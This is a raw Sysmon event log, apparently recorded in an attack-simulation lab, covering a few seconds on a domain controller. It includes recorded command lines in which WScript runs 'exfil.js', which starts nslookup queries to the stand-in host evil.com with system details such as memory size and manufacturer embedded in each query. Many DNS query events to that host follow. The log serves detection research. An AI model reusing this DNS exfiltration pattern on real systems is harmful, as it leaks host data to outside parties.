14:21:28.881{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3743-000000005F02}3396C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.877{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.877{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.876{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.876{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.875{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3643-000000005F02}7508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.875{2E1864BB-18E0-629A-6742-000000005F02}39767388C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-3643-000000005F02}7508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.875{2E1864BB-18E8-629A-3643-000000005F02}7508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgldtl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000207929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.276{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50575- 354300x8000000000000000207928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.276{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50574- 354300x8000000000000000207927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.275{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50573- 354300x8000000000000000207926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.685{00000000-0000-0000-0000-000000000000}4228<unknown process>-udpfalsefalse127.0.0.1-50554-false127.0.0.1-53domain 354300x8000000000000000207925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.062{00000000-0000-0000-0000-000000000000}7532<unknown process>-udpfalsefalse127.0.0.1-50534-false127.0.0.1-53domain 354300x8000000000000000207924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.984{00000000-0000-0000-0000-000000000000}896<unknown process>-udptruefalse127.0.0.1-50531-false127.0.0.1-53domain 23542300x8000000000000000207923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.859{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllyzi.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.859{2E1864BB-18E8-629A-3443-000000005F02}61922720C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-3543-000000005F02}3444C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.844{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3543-000000005F02}3444C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.844{2E1864BB-18E8-629A-3343-000000005F02}37928072C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-3543-000000005F02}3444C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.855{2E1864BB-18E8-629A-3543-000000005F02}3444C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-3343-000000005F02}3792C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllyzi.tmp 2>&1 10341000x8000000000000000207914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.828{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-3443-000000005F02}6192C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.828{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-3443-000000005F02}6192C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.828{2E1864BB-18E8-629A-3443-000000005F02}61922720C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-3343-000000005F02}3792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000207911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.787{00000000-0000-0000-0000-000000000000}6512evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.690{00000000-0000-0000-0000-000000000000}1188evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.625{00000000-0000-0000-0000-000000000000}2628evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.555{00000000-0000-0000-0000-000000000000}7036evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.435{00000000-0000-0000-0000-000000000000}8040evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.353{00000000-0000-0000-0000-000000000000}5332evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.278{00000000-0000-0000-0000-000000000000}7960evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.218{00000000-0000-0000-0000-000000000000}3504evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.140{00000000-0000-0000-0000-000000000000}4344evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.058{00000000-0000-0000-0000-000000000000}3568evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.982{00000000-0000-0000-0000-000000000000}3724evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.879{00000000-0000-0000-0000-000000000000}6016evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.754{00000000-0000-0000-0000-000000000000}8052evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.687{00000000-0000-0000-0000-000000000000}4228evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.600{00000000-0000-0000-0000-000000000000}6576evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.522{00000000-0000-0000-0000-000000000000}4832evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.453{00000000-0000-0000-0000-000000000000}2104evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000207894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.812{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3443-000000005F02}6192C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.812{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.812{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.812{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.812{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 